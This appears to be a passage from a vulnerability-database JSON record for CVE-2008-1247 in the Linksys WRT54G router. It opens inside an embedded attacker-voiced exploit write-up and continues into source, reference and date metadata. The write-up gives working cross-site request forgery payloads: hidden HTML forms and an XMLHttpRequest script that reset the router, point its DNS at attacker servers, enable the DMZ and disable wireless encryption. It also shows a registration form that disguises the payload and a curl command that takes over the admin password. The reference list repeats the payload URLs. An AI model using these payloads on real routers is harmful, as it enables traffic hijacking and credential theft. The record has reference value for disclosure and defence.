\nrequire different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log. \n\nNow that the malicious page has been composed and sits online living and waiting for marks at \nhttp://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom \nPHP logging script. In mark.txt, our logging file, sample output would resemble something like the \nfollowing. \n\nPotential mark resides at 1.1.1.1\n\nPotential mark resides at 2.2.2.2\n\nPotential mark resides at 3.3.3.3\n\nSo forth... \n\nThey are potential marks because it is unknown whether or not they are using the WRT54G with a \nsupported firmware version that is exploitable using these techniques, and/or the exploit attempt \nfailed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not \nusing the default local address (good for them) that this attack relies on. \n\nWhen they browse the page, because we have set no timeout for this change to occur, they are \ninstantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, \ndoes not inform the user if they were educated enough of what has just happened, so they may \ncontinue on doing whatever they were doing, more often than not unaware of what has just happened. \nAt the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at \nour leisure and further test the remote host whether or not they are vulnerable to attack. At the \nvery least, we may decide to completely reset the router to rest assured we know its current state \nto make further compromise a snap, such as altering the device\u0027s DNS records for sniffing traffic. \nThis is quite feasible, here\u0027s how. \n\n\u003cform method=\"post\" action=\"http://192.168.1.1/factdefa.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"FactoryDefaults\" value=\"Yes\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nThis gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes\u0026layout=en\n\nNow we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs \nall incoming and outgoing requests before passing them on to the next in line. \n\n\u003cform method=\"post\" action=\"http://192.168.1.1/Basic.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_end\" value=\"149\"\u003e\n \u003cinput type=\"hidden\" name=\"oldMtu\" value=\"1500\"\u003e\n \u003cinput type=\"hidden\" name=\"oldLanSubnet\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"OldWanMode\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP1\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP2\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"SDHCP4\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP1\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP2\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"EDHCP4\" value=\"150\"\u003e\n \u003cinput type=\"hidden\" name=\"pd\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"now_proto\" value=\"dhcp\"\u003e\n \u003cinput type=\"hidden\" name=\"old_domain\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"chg_lanip\" value=\"192.168.1.1\"\u003e\n \u003cinput type=\"hidden\" name=\"_daylight_time\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_proto\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"router_name\" value=\"WRT54G\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_hostname\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"wan_domain\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"mtu_enable\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_0\" value=\"192\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_1\" value=\"168\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_2\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_ipaddr_3\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_netmask\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"lan_proto\" value=\"Enable\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_start\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_num\" value=\"50\"\u003e\n \u003cinput type=\"hidden\" name=\"dhcp_lease\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_0\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_1\" value=\"2\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_2\" value=\"3\"\u003e\n \u003cinput type=\"hidden\" name=\"dns0_3\" value=\"4\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_0\" value=\"5\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_1\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_2\" value=\"7\"\u003e\n \u003cinput type=\"hidden\" name=\"dns1_3\" value=\"8\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_0\" value=\"9\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_1\" value=\"8\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_2\" value=\"7\"\u003e\n \u003cinput type=\"hidden\" name=\"dns2_3\" value=\"6\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_0\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_1\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_2\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"wins_3\" value=\"0\"\u003e\n \u003cinput type=\"hidden\" name=\"time_zone\" value=\"%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29\"\u003e\n \u003cinput type=\"hidden\" name=\"daylight_time\" value=\"ON\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\nThis is indeed convoluted but all of these values must be in place in order to be successful. What \nis it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our \nown custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, \nand DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while \nobtaining its dynamic IP from the ISP. In case you\u0027re curious, these forms are used to construct the \nfollowing URL that is submitted to http://192.168.1.1/Basic.tri. \n\nhttp://192.168.1.1/Basic.tri?dhcp_end=149\u0026oldMtu=1500\u0026oldLanSubnet=0\u0026OldWanMode=0\u0026SDHCP1=192\u0026SDHCP2=168\u0026SDHCP3=1\u0026SDHCP4=100\u0026EDHCP1=192\u0026EDHCP2=168\u0026EDHCP3=1\u0026EDHCP4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=WRT54G\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=Enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=1\u0026dns0_1=2\u0026dns0_2=3\u0026dns0_3=4\u0026dns1_0=5\u0026dns1_1=6\u0026dns1_2=7\u0026dns1_3=8\u0026dns2_0=9\u0026dns2_1=8\u0026dns2_2=7\u0026dns2_3=6\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29\u0026daylight_time=ON\u0026layout=en\n\n++| An Alternative (with JavaScript)\n----------------------\nThis is the basic exploitation method of the router although the attacker has many alternatives of \nsubmitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. \nA few alternative methods would include using a JavaScript onClick function within a standard \nlooking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:\n\n\u003ca href=\"/path/\" onClick=\"xhrRequest();\"\u003eThis looks innocent enough.\u003c/a\u003e\n\n...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this \nstandard looking navigation link, e.g.:\n\nvar xhr=false;\nif(window.XMLHttpRequest) {\n xhr=new XMLHttpRequest();\n} else if(window.ActiveXObject) {\n xhr=new ActiveXObject(\"Microsoft.XMLHTTP\");\n}\nfunction xhrRequest() {\n if(xhr) {\n xhr.open(\"POST\", \"http://192.168.1.1/Security.tri\", true);\n xhr.setRequestHeader(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027);\n xhr.onreadystatechange=function() {\n if(xhr.readyState == 4 \u0026\u0026 xhr.status == 200) {\n var success=xhr.responseText;\n }\n }\n xhr.send(\"SecurityMode=0\u0026layout=en\");\n }\n}\n\nThe example above effectively disables all wireless encryption so that if you happen to live close \nenough to this poor individual, it is your duty to pwn their wireless by enabling open access for \neverybody in the neighborhood! Here\u0027s the URL for disabling wireless encryption:\n\nhttp://192.168.1.1/Security.tri?SecurityMode=0\u0026layout=en\n\n++| An Alternative (without JavaScript)\n----------------------\nYou\u0027re still exploitable even if you do not allow scripts from executing, e.g., you use Firefox + \nNoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent \nlooking methods of compromising your WRT54G. For example, user registration for a bulletin board or \nforum system. The site must acquire a minimal amount of information in order to create the account \nso it is in submitting this data that we may submit our own payload, perhaps this time we\u0027d like to \nenable DMZ for complete access to any and all shares/services on our mark\u0027s computer. Here is the \nURL once again:\n\nhttp://192.168.1.1/dmz.tri?action=Apply\u0026dmz_enable=1\u0026dmz_ipaddr=100\u0026layout=en\n\nAgain it is a different script processing the request on behalf of the router\u0027s internal operating \nsystem, dmz.tri, but it still does not require authentication prior to changing the settings we wish \nto change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:\n\n\u003cform method=\"post\" action=\"http://192.168.1.1/dmz.tri\"\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"Apply\"\u003e\n \u003cinput type=\"hidden\" name=\"dmz_enable\" value=\"1\"\u003e\n \u003cinput type=\"hidden\" name=\"dmz_ipaddr\" value=\"100\"\u003e\n \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\n...and add these values to their user registration page with standard username/password/e-mail fields... \n \n Username: \u003cinput type=\"text\" name=\"username\"\u003e\u003cbr\u003e\n Password: \u003cinput type=\"password\" name=\"password1\"\u003e\u003cbr\u003e\n Confirm Password: \u003cinput type=\"password\" name=\"password2\"\u003e\u003cbr\u003e\n \u003cinput type=\"submit\"\u003e\n\u003c/form\u003e\n\n...that can be found on traditional forums these days. The mark submits and exploits his/her own \nrouter although they believe they are at least minimally technically savvy by using a combination of \ntechnologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms \nwe use to store the router configs are hidden, and the normal user registration forms are not, thus \nit is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has \ndetected that a potential attack is taking place it is likely too late as the mastermind behind \nhttp://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up \ntargets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration \nchanges within 10 seconds, which is plenty of time for them to open another terminal and change the \nadministrative login to block our mark from changing their settings, e.g.:\n\ncurl -d \"remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026PasswdModify=1\u0026http_passwd=pwn\u0026http_passwdConfirm=pwn\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=0\u0026upnp_enable=1\u0026layout=en\" http://\u003cREMOTE_EXTERNAL_ADDR\u003e/manage.tri\n\nHere the hacker can now log in as admin with password \u0027pwn\u0027 with complete freedom to _REMOTELY_ \nmonitor the mark\u0027s internal and outgoing network traffic. This can allow for capturing passwords \nvia DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the \nrouter to a rogue DHCP server and accordingly, rogue network of the attacker\u0027s, plus more. \n\n++| Conclusion\n----------------------\nIt is my intention in finalizing this document that the reader understands that the Linksys WRT54G \nfirmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care \nwhether or not you have the level of privilege thought to be necessary for manipulating sensitive \nobjects. \n\nThanks go to hw2B for suggesting I write all of this garbage out. \n\n++| URLs\n----------------------\nhttps://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document)\nhttps://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008)\nhttps://kinqpinz.info/lib/wrt54g/own2.txt (this document)\nhttp://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-31372",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1247",
"trust": 3.0
},
{
"db": "BID",
"id": "28381",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "29344",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "5926",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "5313",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "MILW0RM",
"id": "5313",
"trust": 0.6
},
{
"db": "MILW0RM",
"id": "5926",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "XF",
"id": "41118",
"trust": 0.6
},
{
"db": "MISC",
"id": "HTTP://KINQPINZ.INFO/LIB/WRT54G/OWN.TXT",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "67644",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "64904",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-65280",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-8833",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-31372",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "64785",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"id": "VAR-200803-0170",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:26:38.262000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://kinqpinz.info/lib/wrt54g/own.txt"
},
{
"trust": 1.9,
"url": "https://kinqpinz.info/lib/wrt54g/"
},
{
"trust": 1.8,
"url": "https://kinqpinz.info/lib/wrt54g/own2.txt"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/28381"
},
{
"trust": 1.7,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/29344"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/5313"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/5926"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41118"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1247"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1247"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.milw0rm.com/exploits/5926"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/41118"
},
{
"trust": 0.6,
"url": "http://www.milw0rm.com/exploits/5313"
},
{
"trust": 0.3,
"url": "http://www.linksys.com"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/security.tri?securitymode=0\u0026layout=en"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-1247"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/factdefa.tri?factorydefaults=yes\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/basic.tri?dhcp_end=149\u0026oldmtu=1500\u0026oldlansubnet=0\u0026oldwanmode=0\u0026sdhcp1=192\u0026sdhcp2=168\u0026sdhcp3=1\u0026sdhcp4=100\u0026edhcp1=192\u0026edhcp2=168\u0026edhcp3=1\u0026edhcp4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=wrt54g\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=1\u0026dns0_1=2\u0026dns0_2=3\u0026dns0_3=4\u0026dns1_0=5\u0026dns1_1=6\u0026dns1_2=7\u0026dns1_3=8\u0026dns2_0=9\u0026dns2_1=8\u0026dns2_2=7\u0026dns2_3=6\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29\u0026daylight_time=on\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/dmz.tri?action=apply\u0026dmz_enable=1\u0026dmz_ipaddr=100\u0026layout=en"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/factdefa.tri\"\u003e"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/basic.tri\"\u003e"
},
{
"trust": 0.2,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-1247"
},
{
"trust": 0.2,
"url": "http://192.168.1.1/dmz.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://www.intoto.com/company.shtml."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ctlog.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri?wl_macmode1=0"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/vpn.tri\"\u003e"
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/lib/wrt54g/,"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri?remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026passwdmodify=1\u0026http_passwd=asdf\u0026http_passwdconfirm=asdf\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=0\u0026upnp_enable=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/dmz.tri?action=apply\u0026dmz_enable=0\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/tracert.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/config.bin\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/config.bin."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/manage.tri?remote_mgt_https=0\u0026http_enable=1\u0026https_enable=0\u0026passwdmodify=1\u0026http_passwd=asdf\u0026http_passwdconfirm=asdf\u0026_http_enable=1\u0026web_wl_filter=1\u0026remote_management=1\u0026http_wanport=31337\u0026upnp_enable=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/factdefa.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wfilter.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/rstatus.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri?submit_type=\u0026channelno=11\u0026oldwirelessmode=3\u0026mode=3\u0026ssid=pwnage\u0026channel=6\u0026freq=6\u0026wl_closed=1\u0026sesmode=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ptrigger.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/dmz.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/ping.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri?dhcp_end=149\u0026oldmtu=1500\u0026oldlansubnet=0\u0026oldwanmode=0\u0026sdhcp1=192\u0026sdhcp2=168\u0026sdhcp3=1\u0026sdhcp4=100\u0026edhcp1=192\u0026edhcp2=168\u0026edhcp3=1\u0026edhcp4=150\u0026pd=\u0026now_proto=dhcp\u0026old_domain=\u0026chg_lanip=192.168.1.1\u0026_daylight_time=1\u0026wan_proto=0\u0026router_name=wrt54g\u0026wan_hostname=\u0026wan_domain=\u0026mtu_enable=0\u0026lan_ipaddr_0=192\u0026lan_ipaddr_1=168\u0026lan_ipaddr_2=1\u0026lan_ipaddr_3=1\u0026lan_netmask=0\u0026lan_proto=enable\u0026dhcp_start=100\u0026dhcp_num=50\u0026dhcp_lease=0\u0026dns0_0=0\u0026dns0_1=0\u0026dns0_2=0\u0026dns0_3=0\u0026dns1_0=0\u0026dns1_1=0\u0026dns1_2=0\u0026dns1_3=0\u0026dns2_0=0\u0026dns2_1=0\u0026dns2_2=0\u0026dns2_3=0\u0026wins_0=0\u0026wins_1=0\u0026wins_2=0\u0026wins_3=0\u0026time_zone=%28gmt-08%3a00%29+pacific+time+%28usa+%26+canada%29\u0026daylight_time=on\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/portrange.tri\"\u003e"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/29344/"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/?page=changelog"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/"
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/basic.tri."
},
{
"trust": 0.1,
"url": "http://\u003cremote_external_addr\u003e/manage.tri"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri."
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1."
},
{
"trust": 0.1,
"url": "https://kinqpinz.info/lib/wrt54g/."
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/index.php"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wbasic.tri?submit_type=\u0026channelno=11\u0026oldwirelessmode=3\u0026mode=3\u0026ssid=kinqpinz\u0026channel=6\u0026freq=6\u0026wl_closed=1\u0026sesmode=1\u0026layout=en"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/security.tri\","
},
{
"trust": 0.1,
"url": "http://www.hacker.tld/index.php,"
},
{
"trust": 0.1,
"url": "http://www.hacker.tld"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31372"
},
{
"db": "BID",
"id": "28381"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"db": "PACKETSTORM",
"id": "64904"
},
{
"db": "PACKETSTORM",
"id": "64785"
},
{
"db": "PACKETSTORM",
"id": "67644"
},
{
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31372"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "28381"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"date": "2008-03-26T21:47:04",
"db": "PACKETSTORM",
"id": "64904"
},
{
"date": "2008-03-21T21:12:32",
"db": "PACKETSTORM",
"id": "64785"
},
{
"date": "2008-06-24T19:34:03",
"db": "PACKETSTORM",
"id": "67644"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31372"
},
{
"date": "2009-04-29T20:56:00",
"db": "BID",
"id": "28381"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004203"
},
{
"date": "2018-10-11T20:31:17.277000",
"db": "NVD",
"id": "CVE-2008-1247"
},
{
"date": "2008-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54g On the router Web Vulnerability to execute arbitrary administrator operations in the interface",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004203"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-125"
}
],
"trust": 0.6
}
}
VAR-200610-0506
